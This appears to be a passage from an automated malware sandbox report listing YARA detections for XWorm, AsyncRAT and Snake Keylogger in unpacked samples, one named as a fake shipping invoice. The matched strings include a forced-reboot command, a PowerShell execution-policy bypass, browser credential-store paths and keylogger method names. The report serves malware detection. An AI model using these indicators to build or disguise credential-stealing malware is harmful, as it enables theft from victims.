Process Memory Space: ungagCKiEnZdl.exe PID: 7644	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ungagCKiEnZdl.exe PID: 7644	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.HOYVjVj.exe.352e4c4.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
10.2.HOYVjVj.exe.352e4c4.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4947:$str05: Select * from AntivirusProduct 0x4b45:$str06: PCRestart 0x4b59:$str07: shutdown.exe /f /r /t 0 0x4c0b:$str08: StopReport 0x4be1:$str09: StopDDos 0x4ce3:$str10: sendPlugin 0x4d63:$str11: OfflineKeylogger Not Enabled 0x4ec9:$str12: -ExecutionPolicy Bypass -File " 0x4ff2:$str13: Content-length: 5235
10.2.HOYVjVj.exe.352e4c4.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x509b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5138:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x524d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f0d:$cnc4: POST / HTTP/1.1
14.2.HOYVjVj.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.HOYVjVj.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6747:$str05: Select * from AntivirusProduct 0x6945:$str06: PCRestart 0x6959:$str07: shutdown.exe /f /r /t 0 0x6a0b:$str08: StopReport 0x69e1:$str09: StopDDos 0x6ae3:$str10: sendPlugin 0x6b63:$str11: OfflineKeylogger Not Enabled 0x6cc9:$str12: -ExecutionPolicy Bypass -File " 0x6df2:$str13: Content-length: 5235
14.2.HOYVjVj.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x704d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d0d:$cnc4: POST / HTTP/1.1
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4947:$str05: Select * from AntivirusProduct 0x4b45:$str06: PCRestart 0x4b59:$str07: shutdown.exe /f /r /t 0 0x4c0b:$str08: StopReport 0x4be1:$str09: StopDDos 0x4ce3:$str10: sendPlugin 0x4d63:$str11: OfflineKeylogger Not Enabled 0x4ec9:$str12: -ExecutionPolicy Bypass -File " 0x4ff2:$str13: Content-length: 5235
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x509b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5138:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x524d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f0d:$cnc4: POST / HTTP/1.1
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4947:$str05: Select * from AntivirusProduct 0x4b45:$str06: PCRestart 0x4b59:$str07: shutdown.exe /f /r /t 0 0x4c0b:$str08: StopReport 0x4be1:$str09: StopDDos 0x4ce3:$str10: sendPlugin 0x4d63:$str11: OfflineKeylogger Not Enabled 0x4ec9:$str12: -ExecutionPolicy Bypass -File " 0x4ff2:$str13: Content-length: 5235
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x509b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5138:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x524d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f0d:$cnc4: POST / HTTP/1.1
10.2.HOYVjVj.exe.352e4c4.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
10.2.HOYVjVj.exe.352e4c4.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0xdec5:$str01: $VB$Local_Port 0x16945:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0xdeb6:$str02: $VB$Local_Host 0x16936:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0xe1c6:$str03: get_Jpeg 0x16c46:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0xdb6e:$str04: get_ServicePack 0x165ee:$str04: get_ServicePack 0x6747:$str05: Select * from AntivirusProduct 0xec27:$str05: Select * from AntivirusProduct 0x176a7:$str05: Select * from AntivirusProduct 0x6945:$str06: PCRestart 0xee25:$str06: PCRestart 0x178a5:$str06: PCRestart 0x6959:$str07: shutdown.exe /f /r /t 0 0xee39:$str07: shutdown.exe /f /r /t 0 0x178b9:$str07: shutdown.exe /f /r /t 0
10.2.HOYVjVj.exe.352e4c4.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf37b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17dfb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf418:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17e98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x704d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf52d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17fad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d0d:$cnc4: POST / HTTP/1.1 0xf1ed:$cnc4: POST / HTTP/1.1 0x17c6d:$cnc4: POST / HTTP/1.1
10.2.HOYVjVj.exe.35369a4.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
10.2.HOYVjVj.exe.35369a4.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4947:$str05: Select * from AntivirusProduct 0x4b45:$str06: PCRestart 0x4b59:$str07: shutdown.exe /f /r /t 0 0x4c0b:$str08: StopReport 0x4be1:$str09: StopDDos 0x4ce3:$str10: sendPlugin 0x4d63:$str11: OfflineKeylogger Not Enabled 0x4ec9:$str12: -ExecutionPolicy Bypass -File " 0x4ff2:$str13: Content-length: 5235
10.2.HOYVjVj.exe.35369a4.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x509b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5138:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x524d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f0d:$cnc4: POST / HTTP/1.1
16.0.bdeukn.exe.440000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
16.0.bdeukn.exe.440000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x16727:$a7: get_logins 0x163b9:$a8: GetOutlookPasswords 0x15fe6:$a9: StartKeylogger 0x16680:$a10: KeyLoggerEventArgs 0x1605e:$a11: KeyLoggerEventArgsEventHandler 0x145b7:$a12: GetDataPassword
16.0.bdeukn.exe.440000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data
16.0.bdeukn.exe.440000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x154e0:$s2: SetHook 0x154e8:$s3: CallNextHook 0x154f5:$s4: _hook
16.0.bdeukn.exe.440000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x18ae2:$m2: Clipboard Logs ID 0x18d16:$m2: Screenshot Logs ID 0x18e26:$m2: keystroke Logs ID 0x19100:$m3: SnakePW 0x18cee:$m4: \SnakeKeylogger\
10.2.HOYVjVj.exe.35369a4.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
10.2.HOYVjVj.exe.35369a4.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0xe465:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0xe456:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0xe766:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0xe10e:$str04: get_ServicePack 0x6747:$str05: Select * from AntivirusProduct 0xf1c7:$str05: Select * from AntivirusProduct 0x6945:$str06: PCRestart 0xf3c5:$str06: PCRestart 0x6959:$str07: shutdown.exe /f /r /t 0 0xf3d9:$str07: shutdown.exe /f /r /t 0 0x6a0b:$str08: StopReport 0xf48b:$str08: StopReport 0x69e1:$str09: StopDDos 0xf461:$str09: StopDDos 0x6ae3:$str10: sendPlugin 0xf563:$str10: sendPlugin 0x6b63:$str11: OfflineKeylogger Not Enabled
10.2.HOYVjVj.exe.35369a4.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf91b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf9b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x704d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfacd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d0d:$cnc4: POST / HTTP/1.1 0xf78d:$cnc4: POST / HTTP/1.1
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0xe4a5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0xe496:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0xe7a6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0xe14e:$str04: get_ServicePack 0x6747:$str05: Select * from AntivirusProduct 0xf207:$str05: Select * from AntivirusProduct 0x6945:$str06: PCRestart 0xf405:$str06: PCRestart 0x6959:$str07: shutdown.exe /f /r /t 0 0xf419:$str07: shutdown.exe /f /r /t 0 0x6a0b:$str08: StopReport 0xf4cb:$str08: StopReport 0x69e1:$str09: StopDDos 0xf4a1:$str09: StopDDos 0x6ae3:$str10: sendPlugin 0xf5a3:$str10: sendPlugin 0x6b63:$str11: OfflineKeylogger Not Enabled
0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf95b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf9f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x704d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfb0d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d0d:$cnc4: POST / HTTP/1.1 0xf7cd:$cnc4: POST / HTTP/1.1
15.2.bxhciy.exe.17053d48.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.bxhciy.exe.17053d48.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127c7:$a1: get_encryptedPassword 0x12c65:$a2: get_encryptedUsername 0x12527:$a3: get_timePasswordChanged 0x12633:$a4: get_passwordField 0x127dd:$a5: set_encryptedPassword 0x145cd:$a6: get_passwords 0x14927:$a7: get_logins 0x145b9:$a8: GetOutlookPasswords 0x141e6:$a9: StartKeylogger 0x14880:$a10: KeyLoggerEventArgs 0x1425e:$a11: KeyLoggerEventArgsEventHandler 0x127b7:$a12: GetDataPassword
15.2.bxhciy.exe.17053d48.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x196fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1892c:$a3: \Google\Chrome\User Data\Default\Login Data 0x18d5f:$a4: \Orbitum\User Data\Default\Login Data 0x19d9e:$a5: \Kometa\User Data\Default\Login Data
15.2.bxhciy.exe.17053d48.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x136d9:$s1: UnHook 0x136e0:$s2: SetHook 0x136e8:$s3: CallNextHook 0x136f5:$s4: _hook
15.2.bxhciy.exe.17053d48.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x13f33:$s8: GrabbedClp 0x141e6:$s9: StartKeylogger 0x16d16:$x1: $%SMTPDV$ 0x155a8:$x2: $#TheHashHere%& 0x16cbe:$x3: %FTPDV$ 0x15548:$x4: $%TelegramDv$ 0x1425e:$x5: KeyLoggerEventArgs 0x14880:$x5: KeyLoggerEventArgs 0x16ce2:$m2: Clipboard Logs ID 0x16f16:$m2: Screenshot Logs ID 0x17026:$m2: keystroke Logs ID 0x17300:$m3: SnakePW 0x16eee:$m4: \SnakeKeylogger\
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0xded1:$str01: $VB$Local_Port 0x16991:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0xdec2:$str02: $VB$Local_Host 0x16982:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0xe1d2:$str03: get_Jpeg 0x16c92:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0xdb7a:$str04: get_ServicePack 0x1663a:$str04: get_ServicePack 0x6747:$str05: Select * from AntivirusProduct 0xec33:$str05: Select * from AntivirusProduct 0x176f3:$str05: Select * from AntivirusProduct 0x6945:$str06: PCRestart 0xee31:$str06: PCRestart 0x178f1:$str06: PCRestart 0x6959:$str07: shutdown.exe /f /r /t 0 0xee45:$str07: shutdown.exe /f /r /t 0 0x17905:$str07: shutdown.exe /f /r /t 0
0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf387:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17e47:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf424:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17ee4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x704d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf539:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17ff9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d0d:$cnc4: POST / HTTP/1.1 0xf1f9:$cnc4: POST / HTTP/1.1 0x17cb9:$cnc4: POST / HTTP/1.1
25.2.ungagCKiEnZdl.exe.16f04680.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
25.2.ungagCKiEnZdl.exe.16f04680.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127c7:$a1: get_encryptedPassword 0x12c65:$a2: get_encryptedUsername 0x12527:$a3: get_timePasswordChanged 0x12633:$a4: get_passwordField 0x127dd:$a5: set_encryptedPassword 0x145cd:$a6: get_passwords 0x14927:$a7: get_logins 0x145b9:$a8: GetOutlookPasswords 0x141e6:$a9: StartKeylogger 0x14880:$a10: KeyLoggerEventArgs 0x1425e:$a11: KeyLoggerEventArgsEventHandler 0x127b7:$a12: GetDataPassword
25.2.ungagCKiEnZdl.exe.16f04680.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x196fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1892c:$a3: \Google\Chrome\User Data\Default\Login Data 0x18d5f:$a4: \Orbitum\User Data\Default\Login Data 0x19d9e:$a5: \Kometa\User Data\Default\Login Data
25.2.ungagCKiEnZdl.exe.16f04680.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x136d9:$s1: UnHook 0x136e0:$s2: SetHook 0x136e8:$s3: CallNextHook 0x136f5:$s4: _hook
25.2.ungagCKiEnZdl.exe.16f04680.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x13f33:$s8: GrabbedClp 0x141e6:$s9: StartKeylogger 0x16d16:$x1: $%SMTPDV$ 0x155a8:$x2: $#TheHashHere%& 0x16cbe:$x3: %FTPDV$ 0x15548:$x4: $%TelegramDv$ 0x1425e:$x5: KeyLoggerEventArgs 0x14880:$x5: KeyLoggerEventArgs 0x16ce2:$m2: Clipboard Logs ID 0x16f16:$m2: Screenshot Logs ID 0x17026:$m2: keystroke Logs ID 0x17300:$m3: SnakePW 0x16eee:$m4: \SnakeKeylogger\
25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127c7:$a1: get_encryptedPassword 0x12c65:$a2: get_encryptedUsername 0x12527:$a3: get_timePasswordChanged 0x12633:$a4: get_passwordField 0x127dd:$a5: set_encryptedPassword 0x145cd:$a6: get_passwords 0x14927:$a7: get_logins 0x145b9:$a8: GetOutlookPasswords 0x141e6:$a9: StartKeylogger 0x14880:$a10: KeyLoggerEventArgs 0x1425e:$a11: KeyLoggerEventArgsEventHandler 0x127b7:$a12: GetDataPassword
25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x196fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1892c:$a3: \Google\Chrome\User Data\Default\Login Data 0x18d5f:$a4: \Orbitum\User Data\Default\Login Data 0x19d9e:$a5: \Kometa\User Data\Default\Login Data
25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x136d9:$s1: UnHook 0x136e0:$s2: SetHook 0x136e8:$s3: CallNextHook 0x136f5:$s4: _hook
25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x13f33:$s8: GrabbedClp 0x141e6:$s9: StartKeylogger 0x16d16:$x1: $%SMTPDV$ 0x155a8:$x2: $#TheHashHere%& 0x16cbe:$x3: %FTPDV$ 0x15548:$x4: $%TelegramDv$ 0x1425e:$x5: KeyLoggerEventArgs 0x14880:$x5: KeyLoggerEventArgs 0x16ce2:$m2: Clipboard Logs ID 0x16f16:$m2: Screenshot Logs ID 0x17026:$m2: keystroke Logs ID 0x17300:$m3: SnakePW 0x16eee:$m4: \SnakeKeylogger\
15.2.bxhciy.exe.17034708.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.bxhciy.exe.17034708.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127c7:$a1: get_encryptedPassword 0x12c65:$a2: get_encryptedUsername 0x12527:$a3: get_timePasswordChanged 0x12633:$a4: get_passwordField 0x127dd:$a5: set_encryptedPassword 0x145cd:$a6: get_passwords 0x14927:$a7: get_logins 0x145b9:$a8: GetOutlookPasswords 0x141e6:$a9: StartKeylogger 0x14880:$a10: KeyLoggerEventArgs 0x1425e:$a11: KeyLoggerEventArgsEventHandler 0x127b7:$a12: GetDataPassword
15.2.bxhciy.exe.17034708.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x196fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1892c:$a3: \Google\Chrome\User Data\Default\Login Data 0x18d5f:$a4: \Orbitum\User Data\Default\Login Data 0x19d9e:$a5: \Kometa\User Data\Default\Login Data
15.2.bxhciy.exe.17034708.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x136d9:$s1: UnHook 0x136e0:$s2: SetHook 0x136e8:$s3: CallNextHook 0x136f5:$s4: _hook
15.2.bxhciy.exe.17034708.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x13f33:$s8: GrabbedClp 0x141e6:$s9: StartKeylogger 0x16d16:$x1: $%SMTPDV$ 0x155a8:$x2: $#TheHashHere%& 0x16cbe:$x3: %FTPDV$ 0x15548:$x4: $%TelegramDv$ 0x1425e:$x5: KeyLoggerEventArgs 0x14880:$x5: KeyLoggerEventArgs 0x16ce2:$m2: Clipboard Logs ID 0x16f16:$m2: Screenshot Logs ID 0x17026:$m2: keystroke Logs ID 0x17300:$m3: SnakePW 0x16eee:$m4: \SnakeKeylogger\
15.2.bxhciy.exe.17053d48.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.bxhciy.exe.17053d48.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x339ff:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x33e9d:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x3375f:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x3386b:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x33a15:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x35805:$a6: get_passwords 0x16727:$a7: get_logins 0x35b5f:$a7: get_logins 0x163b9:$a8: GetOutlookPasswords 0x357f1:$a8: GetOutlookPasswords 0x15fe6:$a9: StartKeylogger 0x3541e:$a9: StartKeylogger 0x16680:$a10: KeyLoggerEventArgs 0x35ab8:$a10: KeyLoggerEventArgs 0x1605e:$a11: KeyLoggerEventArgsEventHandler
